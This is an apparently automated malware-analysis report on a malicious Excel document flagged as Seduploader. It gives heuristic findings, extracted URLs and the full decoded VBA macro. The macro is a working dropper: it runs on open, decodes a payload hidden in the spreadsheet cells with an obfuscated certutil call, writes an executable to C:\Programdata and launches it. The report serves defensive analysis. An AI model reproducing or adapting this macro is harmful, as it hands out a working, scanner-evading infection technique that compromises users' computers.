MALICIOUS
390
Risk Score
Heuristics 10
-
ClamAV: Doc.Dropper.Seduploader-6784277-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Seduploader-6784277-0
-
Malformed OLE auto-open stager with embedded ZIP payload critical OLE_RAW_MALFORMED_AUTOOPEN_STAGERRaw malformed OLE bytes contain an auto-open macro entry, embedded ZIP/theme package bytes, VBA project metadata, and URL/CMD/Shell staging tokens. This is a high-confidence exploit-builder shape where the OLE directory is intentionally malformed, preventing normal VBA extraction while leaving the auto-run stager visible in raw streams.
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _ -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open() -
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes foundDisassembly hidden — these bytes score as degenerate, not coherent x86 code (single mnemonic 'inc' is 100% of instructions — a sled or padding/filler run, not program logic).
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.maritime-recon.com/janes In document text (OLE body)
- http://www.mobiledeployable.com/janesIn document text (OLE body)
- http://www.globalsofsymposium.org/us#1In document text (OLE body)
- http://www.maritime-recon.com/janes�In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2577 bytes |
SHA-256: 65c3fe528293239f417e1129f19c1fe126b3214a35d389c66ca3477a3738222e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Sub Auto_Open()
ActiveSheet.Range("a1:c54").Font.Color = vbBlack
Call LinesOfBusiness.TQuH8wDO
End Sub
Attribute VB_Name = "LinesOfBusiness"
#If VBA7 Then
Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As LongPtr)
#Else
Public Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Function GetVal(sr As Long, er As Long, c As Long)
Dim x
For i = sr To er
x = x + Cells(i, c)
Next
GetVal = x
End Function
Function GetRand()
Dim r As String
Dim i As Integer
Randomize
For i = 1 To 8
If i Mod 2 = 0 Then
r = Chr(Int((90 - 65 + 1) * Rnd + 65)) & r
Else
r = Int((9 * Rnd) + 1) & r
End If
Next i
GetRand = r
End Function
Sub cutil(code As String)
Dim x As String
x = "-----BEG" & "IN CER" & "TIFICATE-----"
x = "-----BEG" & "IN CER" & "TIFI" & "CATE-----"
x = x + vbNewLine
x = x + code
x = x + vbNewLine
x = x + "-----E" & "ND CERTIF" & "ICATE-----"
Dim path As String
path = "C:\Programdata\" & rndname & ".txt"
expath = "C:\Programdata\" & rndname & ".exe"
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemObject")
path = "C:\Programdata\" & GetRand & ".txt"
expath = "C:\Programdata\" & GetRand & ".exe"
Set scr = CreateObject("Scr" & "ipting.FileSy" & "stemOb" & "ject")
Set file = scr.CreateTextFile(path, True)
file.Write x
file.Close
Shell (Chr(99) & Chr(101) & Chr(114) & Chr(116) & Chr(117) & Chr(116) & Chr(105) & Chr(108) & Chr(32) & _
Chr(45) & Chr(100) & Chr(101) & Chr(99) & Chr(111) & Chr(100) & Chr(101) & Chr(32) & path & " " & expath)
Sleep 2000
Shell (expath)
End Sub
Sub TQuH8wDO()
Dim p As String
p = GetVal(2227, 2248, 170)
cutil (p)
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.